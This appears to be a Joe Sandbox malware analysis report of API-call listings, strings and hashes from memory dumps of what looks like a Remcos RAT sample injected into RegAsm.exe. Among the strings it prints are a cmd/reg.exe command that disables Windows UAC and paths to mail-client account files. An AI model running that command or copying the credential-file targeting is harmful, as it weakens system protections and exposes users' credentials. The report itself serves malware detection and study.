                                                                • _abort.LIBCMT ref: 10005B74
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                • _free.LIBCMT ref: 004482CC
                                                                • _free.LIBCMT ref: 004482F4
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                • _abort.LIBCMT ref: 00448313
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                APIs
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                • API String ID: 4036392271-1520055953
                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                APIs
                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                • String ID: 0$MsgWindowClass
                                                                • API String ID: 2877667751-2410386613
                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                APIs
                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                Strings
                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateProcess
                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                • API String ID: 2922976086-4183131282
                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                Strings
                                                                • Rmc-I89M3S, xrefs: 00407715
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-I89M3S
                                                                • API String ID: 0-769694051
                                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                • String ID: KeepAlive | Disabled
                                                                • API String ID: 2993684571-305739064
                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                APIs
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                • String ID: Alarm triggered
                                                                • API String ID: 614609389-2816303416
                                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                Strings
                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                • API String ID: 3024135584-2418719853
                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 0044943D
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 1286116820-0
                                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 2180151492-0
                                                                • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
